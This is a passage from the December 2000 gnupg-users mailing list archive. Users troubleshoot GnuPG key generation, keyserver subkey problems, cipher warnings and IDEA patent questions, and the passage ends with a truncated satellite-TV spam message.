NetBSD 1.5 (and I think, it did on 1.4.2, too). | #info Checking conventional encryption | for i in 0 1 2 3 9 10 11 19 20 21 22 23 39 40 41 8192 32000 ; do | for ciph in 3des cast5 blowfish twofish; do | dd if=data-80000 of=z bs=1 count=$i 2>/dev/null What happens is that for the first loop iteration, dd should generate a file "z" of size zero (correct?), but it creates no file at all, so that gpg exits with a message "z: no such file or directory". Whether the problem lies with dd or the assumption that it should generate a zero size file if invoked as above, I cannot say. The test works fine if I remove 0 from the loop, though. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dmichellis@uol.com.br Mon Dec 18 16:14:18 2000 From: dmichellis@uol.com.br (Deives Michellis) Date: Mon, 18 Dec 2000 14:14:18 -0200 Subject: Getting Started with gnuPG References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: <000f01c0690d$936b7bc0$0300a8c0@help3> Hi all! I download the gnuPG for Windows (no jokes, please!) and I am completely lost about how to start to use it... When it will generate the pairs, gnuPG ask for the key (768 bytes or more). This key is "buyed" from some organizations (like VeriSign), or I can just make my own key and use it? Thanks a lot for take your atention!! Deives Michellis -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 18 16:26:50 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 18 Dec 2000 17:26:50 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: ; from Florian.Weimer@RUS.Uni-Stuttgart.DE on Mon, Dec 18, 2000 at 03:51:51PM +0100 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: <20001218172650.I12265@gnupg.de> On Mon, 18 Dec 2000, Florian Weimer wrote: > There is neither a court judgment or allegation of patent > infringement. Things may change quite rapidly as soon as he gets a See the comments in idea.c - Ascom explicitly says that you have to acquire a license for nearly all kings of usage. > patents--is common practice (even the FSF does it, see the networking > code in GNU libc, and GnuPG's crypto algorithms except Rijndael are Patented networking code in libc? I don't know of any patent and I have never heard that someone claims that libc uses a patent them. There are no patents on any GnuPG crypto code which are not allowed by the GPL. In fact that was the reason GnuPG has been written. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lewis@sistina.com Mon Dec 18 16:39:44 2000 From: lewis@sistina.com (lewis@sistina.com) Date: Mon, 18 Dec 2000 10:39:44 -0600 Subject: GPG key not fully accepted by public key servers In-Reply-To: ; from stefan@epy.co.at on Sat, Dec 16, 2000 at 01:52:45AM +0100 References: <20001215160843.A11168@sistina.com> Message-ID: <20001218103944.A30434@sistina.com> --Qxx1br4bt0+wmkIi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Dec 16, 2000 at 01:52:45AM +0100, Stefan H. Holek wrote: > On Fri, 15 Dec 2000 lewis@sistina.com wrote: >=20 > > On Fri, Dec 15, 2000 at 04:01:39PM -0600, Brian Minton wrote: > > > On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > > > > Key block corrupt: more than one signature on subk > > >=20 > > > what happens when you do gpg --export 00292648 |gpg --list-packets ? > >=20 >=20 > You have to examine the key *returned* from the keyserver. Gpg will not > import such a key, but you can download and then export it with pgp or > cut & paste it from the web interface. >=20 > You will see something like this=20 > (two subkeys and only one binding signature): =20 Ok, I'm confused (sorry...I feel really stupid) but what do I do with this information. Here's the output from the key I grabbed from pgp.ai.mit.edu. ~> gpg --list-packets test.asc Mon 12.18 10:38 :public key packet: version 4, algo 17, created 974309008, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1016 bits] pkey[3]: [1022 bits] :user ID packet: "AJ Lewis (Roadrunner) " :signature packet: algo 17, keyid 941E126100292648 version 4, created 974309008, md5len 0, sigclass 13 digest algo 2, begin of digest f3 29 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [160 bits] data: [156 bits] :user ID packet: "AJ Lewis " :signature packet: algo 17, keyid 941E126100292648 version 4, created 975593280, md5len 0, sigclass 13 digest algo 2, begin of digest d1 be hashed subpkt 2 len 5 (sig created 2000-11-30) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [159 bits] :public sub key packet: version 4, algo 16, created 974309011, expires 0 pkey[0]: [1024 bits] pkey[1]: [3 bits] pkey[2]: [1023 bits] :public sub key packet: version 4, algo 17, created 974309312, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1023 bits] pkey[3]: [1021 bits] :signature packet: algo 17, keyid 941E126100292648 version 4, created 974310923, md5len 0, sigclass 18 digest algo 2, begin of digest d6 95 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 9 len 5 (key expires after 180d0h31m) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [160 bits] Regards, --=20 AJ Lewis Sistina Software Inc. Voice: 612-379-3951 1313 5th St SE, Suite 111 Fax: 612-379-3952 Minneapolis, MN 55414 E-Mail: lewis@sistina.com http://www.sistina.com Current GPG fingerprint =3D 3B5F 6011 5216 76A5 2F6B 52A0 941E 1261 0029 2= 648 Hey! It compiles! Ship it! --Qxx1br4bt0+wmkIi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Pj3QpE6/iGtdjLERApWHAJ9NaZTi8ZDjsX31mX8EOrrpCMLEUwCfeo1E EU6DGIBZdYnhQ5X30cUIXhU= =vYDy -----END PGP SIGNATURE----- --Qxx1br4bt0+wmkIi-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Mon Dec 18 16:44:57 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Mon, 18 Dec 2000 17:44:57 +0100 Subject: Description of --list-packets Message-ID: <002b01c06911$dad6e1d0$2bf8ae8b@bert> Hello! Can anyone please tell me what I can do with the list-packets command? The description on the manpage is rather short! Thanks, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Mon Dec 18 17:55:39 2000 From: lists@wordit.com (Marcus) Date: Mon, 18 Dec 2000 18:55:39 +0100 Subject: Win32 Installation Package for GPG/WinPT (new) In-Reply-To: <5.0.2.1.0.20001215091602.028c3260@maia.netsonic.net> References: <5.0.2.1.0.20001215091602.028c3260@maia.netsonic.net> Message-ID: <200012181855390230.00486048@smtprelay.t-online.de> On 15.12.00 at 10:04 Ed Suominen wrote: >Without modifying the source of either GPG or WinPT, I've put together an >installation package that allows users to install both programs without >needing to access the command prompt. I think this a great idea. If more people are to use GPG then user friendly tools are required for GUI installation. Ed, which Windows OS are you using? I'm on NT 4, and I think the setup batch file failed. It gave two errors in the DOS window, but continued, then ran WinPT.exe, and stopped. No key creation, and I can't find the drag and drog icons. Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Mon Dec 18 17:52:31 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 18 Dec 2000 18:52:31 +0100 Subject: Description of --list-packets In-Reply-To: <002b01c06911$dad6e1d0$2bf8ae8b@bert> References: <002b01c06911$dad6e1d0$2bf8ae8b@bert> Message-ID: "Stephan Stapel" writes: > Can anyone please tell me what I can do with the list-packets command? The > description on the manpage is rather short! Read RFC 2440. After that, you'll be able to understand the --list-packets output. -- Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE University of Stuttgart http://cert.uni-stuttgart.de/ RUS-CERT +49-711-685-5973/fax +49-711-685-5898 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Mon Dec 18 18:17:07 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 18 Dec 2000 19:17:07 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218172650.I12265@gnupg.de> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <20001218172650.I12265@gnupg.de> Message-ID: Werner Koch writes: > On Mon, 18 Dec 2000, Florian Weimer wrote: > > > There is neither a court judgment or allegation of patent > > infringement. Things may change quite rapidly as soon as he gets a > > See the comments in idea.c - Ascom explicitly says that you have to > acquire a license for nearly all kings of usage. Well, we were told a slightly different story when we asked them a few years ago (see http://cert.uni-stuttgart.de/projects/usca-idea.php). YMMV. > > patents--is common practice (even the FSF does it, see the networking > > code in GNU libc, and GnuPG's crypto algorithms except Rijndael are > > Patented networking code in libc? I don't know of any patent and I > have never heard that someone claims that libc uses a patent them. The concept of standard network byte order, as it is used in the Internet protocols and provided by htonl() and friends, is patented. > There are no patents on any GnuPG crypto code which are not allowed > by the GPL. In fact that was the reason GnuPG has been written. What about the Schnoor patent and DSA? And the two Hitachi patents? -- Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE University of Stuttgart http://cert.uni-stuttgart.de/ RUS-CERT +49-711-685-5973/fax +49-711-685-5898 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Mon Dec 18 18:54:34 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Mon, 18 Dec 2000 19:54:34 +0100 (CET) Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001218103944.A30434@sistina.com> Message-ID: On Mon, 18 Dec 2000 lewis@sistina.com wrote: > Ok, I'm confused (sorry...I feel really stupid) but what do I do with this > information. Here's the output from the key I grabbed from pgp.ai.mit.edu. No reason to feel stupid here! And nothing much you can do either. As of now you should not use pks-type keyservers if you have multiple subkeys. Distribute your public key directly by e.g. linking to it from your webpage. > ~> gpg --list-packets test.asc Mon 12.18 10:38 > :public key packet: > version 4, algo 17, created 974309008, expires 0 > pkey[0]: [1024 bits] > pkey[1]: [160 bits] > pkey[2]: [1016 bits] > pkey[3]: [1022 bits] > :user ID packet: "AJ Lewis (Roadrunner) " > :signature packet: algo 17, keyid 941E126100292648 > version 4, created 974309008, md5len 0, sigclass 13 > digest algo 2, begin of digest f3 29 > hashed subpkt 2 len 5 (sig created 2000-11-15) > hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) > hashed subpkt 21 len 3 (pref-hash-algos: 3 2) > hashed subpkt 22 len 3 (pref-zip-algos: 2 1) > hashed subpkt 23 len 2 (key server preferences) > subpkt 16 len 9 (issuer key ID 941E126100292648) > data: [160 bits] > data: [156 bits] > :user ID packet: "AJ Lewis " > :signature packet: algo 17, keyid 941E126100292648 > version 4, created 975593280, md5len 0, sigclass 13 > digest algo 2, begin of digest d1 be > hashed subpkt 2 len 5 (sig created 2000-11-30) > hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) > hashed subpkt 21 len 3 (pref-hash-algos: 3 2) > hashed subpkt 22 len 3 (pref-zip-algos: 2 1) > hashed subpkt 23 len 2 (key server preferences) > subpkt 16 len 9 (issuer key ID 941E126100292648) > data: [158 bits] > data: [159 bits] > :public sub key packet: > version 4, algo 16, created 974309011, expires 0 > pkey[0]: [1024 bits] > pkey[1]: [3 bits] > pkey[2]: [1023 bits] >>>>>>>>> HERE SHOULD BE A BINDING SIGNATURE <<<<<<<<<<< > :public sub key packet: > version 4, algo 17, created 974309312, expires 0 > pkey[0]: [1024 bits] > pkey[1]: [160 bits] > pkey[2]: [1023 bits] > pkey[3]: [1021 bits] > :signature packet: algo 17, keyid 941E126100292648 > version 4, created 974310923, md5len 0, sigclass 18 > digest algo 2, begin of digest d6 95 > hashed subpkt 2 len 5 (sig created 2000-11-15) > hashed subpkt 9 len 5 (key expires after 180d0h31m) > subpkt 16 len 9 (issuer key ID 941E126100292648) > data: [158 bits] > data: [160 bits] Regards, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Mon Dec 18 19:13:09 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Mon, 18 Dec 2000 20:13:09 +0100 (CET) Subject: Getting Started with gnuPG In-Reply-To: <000f01c0690d$936b7bc0$0300a8c0@help3> Message-ID: On Mon, 18 Dec 2000, Deives Michellis wrote: > I download the gnuPG for Windows (no jokes, please!) and I am completely > lost about how to start to use it... There is the GNU Privacy Handbook at http://www.gnupg.org/docs.html > When it will generate the pairs, gnuPG ask for the key (768 bytes or more). > This key is "buyed" from some organizations (like VeriSign), or I can just > make my own key and use it? Luckily, you never have to buy a key, and - even better - by using PGP you also have full control over your trust relationships and do not have to "rent" trust from large corporations... Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 18 19:59:58 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 18 Dec 2000 20:59:58 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: ; from Florian.Weimer@RUS.Uni-Stuttgart.DE on Mon, Dec 18, 2000 at 07:17:07PM +0100 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <20001218172650.I12265@gnupg.de> Message-ID: <20001218205958.M12265@gnupg.de> On Mon, 18 Dec 2000, Florian Weimer wrote: > The concept of standard network byte order, as it is used in the > Internet protocols and provided by htonl() and friends, is patented. ROTFL. Either we have prior art (one of the early RFCs) or the the patent has expired. > What about the Schnoor patent and DSA? And the two Hitachi patents? Okay. Everything today seems to be patented so we better don't write any code anymore but switch our jobs to be patent attorneys :-) The IDEA patent seems to be different, as there are a couple of cases where Ascom actually sued people over using it. So chances in court are not good. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Mon Dec 18 21:18:14 2000 From: trappedvector@crosswinds.net (Martin) Date: Mon, 18 Dec 2000 22:18:14 +0100 Subject: Symmetric encryption In-Reply-To: <20001217160634.6ed05f3f.brian.galbraith@bigfoot.com>; from brian.galbraith@bigfoot.com on Sun, Dec 17, 2000 at 04:06:34PM +0000 References: <20001217160634.6ed05f3f.brian.galbraith@bigfoot.com> Message-ID: <20001218221814.A933@crosswinds.net> --0OAP2g/MAC+5xKAE Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sunday, December 17, 2000 (CS:7.50.352) 16:06:34 [PM] (+0000) Brian Galbraith [brian.galbraith@bigfoot.com] wrote... > It's a while since I used the symmetric encryption facility og GnuPG, and > currently it does not appear to work for me. Just use gpg -c filename and gpg will ask for a passphrase to encrypt that file. If you want to use ascii armor you would use gpg -c -a filename HTH mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - The only "intuitive" interface is the nipple. After that, it's all learned - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --0OAP2g/MAC+5xKAE Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6Pn8WffxhyW5sNDERAm7hAJ9CxYGnrnkWVY/4i+MLmkT4SL7rxgCgsr+/ MSXCQp1AfwvL25yLxbh4TB4= =39lv -----END PGP SIGNATURE----- --0OAP2g/MAC+5xKAE-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Mon Dec 18 20:39:38 2000 From: trappedvector@crosswinds.net (Martin) Date: Mon, 18 Dec 2000 21:39:38 +0100 Subject: Default Cipher Algorithm Message-ID: <20001218213938.A700@crosswinds.net> --wac7ysb48OaltWcw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi list, i just generated a new key pair with gpg 1.0.4 and all settings on default. just played around with signing and encrypting as i got the following message encrypting a message to myself: gpg: using secondary key CA634208 instead of primary key 6E6C3431 gpg: No trust check due to --always-trust option gpg: writing to `-' gpg: ELG-E/RIJNDAEL encrypted for: CA634208 Martin gpg: DSA signature from: 6E6C3431 Martin gpg: this cipher algorithm is depreciated; please use a more standard on= e! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^= ^^ i know that ELG-E/RIJNDAEL is included in 1.0.4. (BTW thats why i generated a new encryption key) But why does gpg complain about RIJNDAEL not beeing a standard algorithm? confused mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - Linux - its only limit is its physical environment - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --wac7ysb48OaltWcw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6PnYKffxhyW5sNDERAnhaAKCwfbLeyKrAFJxYDV3dT2otXoIvgQCgjGp9 q1Wn3YEqjqYhq5XfjpiYwv8= =sMp9 -----END PGP SIGNATURE----- --wac7ysb48OaltWcw-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Mon Dec 18 22:27:27 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Mon, 18 Dec 2000 23:27:27 +0100 (MET) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218205958.M12265@gnupg.de> from Werner Koch at "Dec 18, 2000 08:59:58 pm" Message-ID: <200012182227.XAA09338@vulcan.xs4all.nl> Werner Koch wrote: > The IDEA patent seems to be different, as there are a couple of > cases where Ascom actually sued people over using it. So chances in > court are not good. I can't tell from the information you give. Did Ascom win those cases? And in which countries did they sue, since not all countries accept software patents? -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From john@unixen.org Tue Dec 19 05:37:09 2000 From: john@unixen.org (John Bacalle) Date: Tue, 19 Dec 2000 00:37:09 -0500 Subject: Decrypt Output is Blank Message-ID: <20001219003709.A2489@unixen.org> RE: GnuPG v1.0.3 (MingW32) encrypted text to GnuPG v1.0.1 (GNU/Linux) I'm either dense tonight or getting some GnuPG stuff from someone else that's new to me. I received an encrypted email from a Win-GPG user. I try to decipher it, gpg -d zulu.asc I'm asked for my pass phrase, I enter it uneventfully, GPG doesn't complain, a few seconds pass, and the prompt returns but no decrypt output. ? I try adding '--output file' but file is blank. I don't know what's up? so I do: gpg -d -vv zulu.asc And I see among the contents, > $ gpg -d -vv zulu.asc > gpg: armor: BEGIN PGP MESSAGE > gpg: armor header: Version: GnuPG v1.0.3 (MingW32) > gpg: armor header: Comment: For info see http://www.gnupg.org > :pubkey enc packet: version 3, algo 16, keyid 1B1CAFC9EC8C49F7 > data: [2047 bits] > data: [2048 bits] > gpg: public key is EC8C49F7 > gpg: loaded digest 2 > > You need a passphrase to unlock the secret key for > user: "John Bacalle " > 2048-bit ELG-E key, ID EC8C49F7, created 2000-07-17 (main key ID E745678E) > > gpg: loaded digest 3 > gpg: key 8AA5C235: accepted as trusted key. > gpg: key E745678E: accepted as trusted key. > gpg: key BA54A558: accepted as trusted key. > gpg: key 4E00CCBB: accepted as trusted key. > gpg: public key encrypted data: good DEK > :unknown packet: type 18, length 163 ^^^^^^^^^^^^^^ Does this mean anything useful? > dump: [...] So, what I have is an 'apparently' good decrypt that doesn't show me the cleartext. Not nice. John -- John Bacalle f./vm. +1 212 894 3778 x1057 N I'm selling several new MCSE and Red Hat books at a discount. My reef Y aquarium and equipment as well: C -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 19 07:51:45 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 19 Dec 2000 08:51:45 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <200012182227.XAA09338@vulcan.xs4all.nl>; from johanw@vulcan.xs4all.nl on Mon, Dec 18, 2000 at 11:27:27PM +0100 References: <20001218205958.M12265@gnupg.de> <200012182227.XAA09338@vulcan.xs4all.nl> Message-ID: <20001219085145.O12265@gnupg.de> On Mon, 18 Dec 2000, Johan Wevers wrote: > I can't tell from the information you give. Did Ascom win those cases? And Soory, I don't know anymore. A long time has passed since I looked into this issue. I know that Ascom has been asked to give a royality free license for IDEA when used in a free (GPLed) software - they refused to do so. I know, we should ask Ascom again to give such a license for free software. I have currently no time to organize such a petition - Great, if you can do so. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Tue Dec 19 09:06:28 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Tue, 19 Dec 2000 10:06:28 +0100 (CET) Subject: Default Cipher Algorithm In-Reply-To: <20001218213938.A700@crosswinds.net> References: <20001218213938.A700@crosswinds.net> Message-ID: <14911.9492.981126.795048@barber.fmi.uni-passau.de> >>>"M" == Martin writes: M> i know that ELG-E/RIJNDAEL is included in 1.0.4. (BTW thats why i generated M> a new encryption key) But why does gpg complain about RIJNDAEL not beeing M> a standard algorithm? Ignore the message. It's a bug. I'll put it in the FAQ now. (Hmm, the FAQ seems to become an important addendum to the BUGS list at http://www.gnupg.org/buglist.html which is seriously out of date. That's not what's it ought to be ...) Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter Biechele Tue Dec 19 10:26:23 2000 From: Peter Biechele (Peter Biechele) Date: Tue, 19 Dec 2000 10:26:23 GMT Subject: Problem encrypting with new key !! Message-ID: <20001219.10262300@morpheus.bextec.de> Hello ! I have created two secret keys using 1024 ElG/DSA as suggested by using GnuPG1.0.4-1. Now I want to encrypt a file using one of the secret keys. To that end I type: gpg -r NameOfKey1 --encrypt filename This works fine. Then I try gpg -r NameOfKey2 --encrypt filename This always gives the message: ---- gpg: Diese Verschlüsselungsmethode taugt nicht mehr viel; verwenden Sie eine stärker stan-dardisierte Methode! (translation: This Encryption Method ist not of great use any more ! Use a stronger standardized Method ! What does This mean ???????? Thank you very much for any help ! Peter Biechele -- Dr. Peter Biechele Tel: +49 7641 920869 41 beXtec GmbH Fax: +49 7641 920869 49 Kaiserstuhlstr. 3, D-79312 Emmendingen E-Mail: Peter.Biechele@bextec.de HTTP : www.bextec.de -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From GaryP@e-c-s-uk.com Tue Dec 19 11:06:43 2000 From: GaryP@e-c-s-uk.com (GaryP) Date: Tue, 19 Dec 2000 11:06:43 -0000 Subject: Key usage / Number of keys Message-ID: <01A12A970375D411BA6900C0F05D178E022A3C@MAINSERVER> Hi, I've generated a key pair at home which i use to enc and sign messages. I keep my trustdb, and seckey ring on write protected floppy disk, to prevent any other user modifying the contents. Mainly on floppy to reduce the time its actually available for copying on the computer. I know there are ways around this, but it makes it a little harder for people to get access to my secring. The question is, i want to sign / enc emails sent from work, should i generate a new key pair for use just at work, allowing a seperate ID that would contain my works email as opposed to my home email. Or should i simply use the home key that i have on floppy disk? Problem with the first is now having two keys / trust dbs etc to maintain, but this does mean i can use a different passphrase, meaning if the passphrase was captured it would only comprimise my work and not home keys. (and vice-versa). This is even more true, by the fact that the works computer will be shared with other users, I have a lot more control over how and who uses my home computer (aside from really paranoid ideas of people breaking in to my home computer, which i'm not worried about, my information isn't that important ;-) Problem with the second is the user id will be my home email address and not my works email, which some people may find strange. Does anyone else do something similar to this? Do you have two keys? or have you found another way around this? Cheers, -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Tue Dec 19 12:17:41 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Tue, 19 Dec 2000 12:17:41 GMT Subject: Key usage / Number of keys In-Reply-To: <01A12A970375D411BA6900C0F05D178E022A3C@MAINSERVER> References: <01A12A970375D411BA6900C0F05D178E022A3C@MAINSERVER> Message-ID: <20001219121102.A660.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, GaryP, On 19 December 2000, I received the following message from you regarding "Key usage / Number of keys" G> Hi, G> G> I've generated a key pair at home which i use to enc and sign G> messages. I keep my trustdb, and seckey ring on write protected floppy G> disk, to prevent any other user modifying the contents. Mainly on floppy G> to reduce the time its actually available for copying on the computer. I G> know there are ways around this, but it makes it a little harder for G> people to get access to my secring. G> G> The question is, i want to sign / enc emails sent from work, should i G> generate a new key pair for use just at work, allowing a seperate ID G> that would contain my works email as opposed to my home email. Or should G> i simply use the home key that i have on floppy disk? G> G> Problem with the first is now having two keys / trust dbs etc to G> maintain, but this does mean i can use a different passphrase, meaning G> if the passphrase was captured it would only comprimise my work and not G> home keys. (and vice-versa). This is even more true, by the fact that G> the works computer will be shared with other users, I have a lot more G> control over how and who uses my home computer (aside from really G> paranoid ideas of people breaking in to my home computer, which i'm not G> worried about, my information isn't that important ;-) G> G> Problem with the second is the user id will be my home email address G> and not my works email, which some people may find strange. G> G> Does anyone else do something similar to this? Do you have two keys? G> or have you found another way around this? G> G> Cheers, As a general rule, under both GnuPG and PGP, I generate a key pair for *each e-mail address* I shall use to send signed/encrypted mail. If you are really trying to make your mail as secure as possible, each key pair will have a different passphrase, but for a small number of addresses a common passphrase would do (although if the passphrase is known by others they will then know all your passphrases...so its often a trade off between security and what you can remember). You can keep all your keys on a floppy which is then used from machine to machine (I've never actually done this with GnuPG, only with PGP under Windows). Hope this helps.. Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 19 December 2000 12:11:02 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4b-winpt (MingW32) Comment: For info see http://www.gnupg.org iD8DBQE6P1HatwKLKus4nE4RAgVXAKCAomy9BCHieT8B9ms7Z/MjSk5exwCggWIW Er8Wdt2OW9I4b+85kosMWdc= =0l9P -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 19 12:33:05 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 19 Dec 2000 13:33:05 +0100 Subject: Problem encrypting with new key !! In-Reply-To: <20001219.10262300@morpheus.bextec.de>; from Peter.Biechele@bextec.de on Tue, Dec 19, 2000 at 10:26:23AM +0000 References: <20001219.10262300@morpheus.bextec.de> Message-ID: <20001219133305.V12265@gnupg.de> On Tue, 19 Dec 2000, Peter Biechele wrote: > This always gives the message: > ---- > gpg: Diese Verschlüsselungsmethode taugt nicht mehr viel; verwenden Sie > eine stärker stan-dardisierte Methode! > (translation: This Encryption Method ist not of great use any more ! Use > a stronger standardized Method ! Don't care about this. Walter: Can you please change the wording of your translation to something like: "Es wird nicht geraten, diese Verschlusselungsmethode zu benuzten". Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fedew@rosario.gov.ar Tue Dec 19 14:26:11 2000 From: fedew@rosario.gov.ar (fedew@rosario.gov.ar) Date: Tue, 19 Dec 2000 11:26:11 -0300 Subject: GPG with LDAP Message-ID: <032569BA.004F0B3E.00@ln01.rosario.gov.ar> Hello. I'm trying to connect GPG with my own server key. To do this I think to use OpenLdap but I can't search any information to help me to connect them. The ldap server (slapd) was listen on port 389 (the default) as stand-alone (not from inetd). The command gpg --keyserver [my server] : 389 --send-keys [a key] respond gpg: [fd 4]: read error: Conection reset by peer. gpg: error sending to `[my server]:389': eof Can you help me? Where can I get more information? Thanks very much. Federico Wiecko -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dave@china.com Sat Dec 16 00:12:07 2000 From: dave@china.com (dave@china.com) Date: Fri, 15 Dec 2000 16:12:07 -0800 Subject: Don't miss this $700 Give Away 752 Message-ID: <000068d5039d$00002fe9$000002f0@middletown.total.net> The answer is.... Free Satellite TV System, Free Installation and Free Vacation! Imagine surfing thru 500 channels of News, Weather, Sports, Learning, Family, Movies, and Pay Per View Channels. AMERICA'S TOP 100 Programming package Includes for just $34.99: Sports - ESPN, ESPN2, ESPN Classic, ESPN News, Empire, 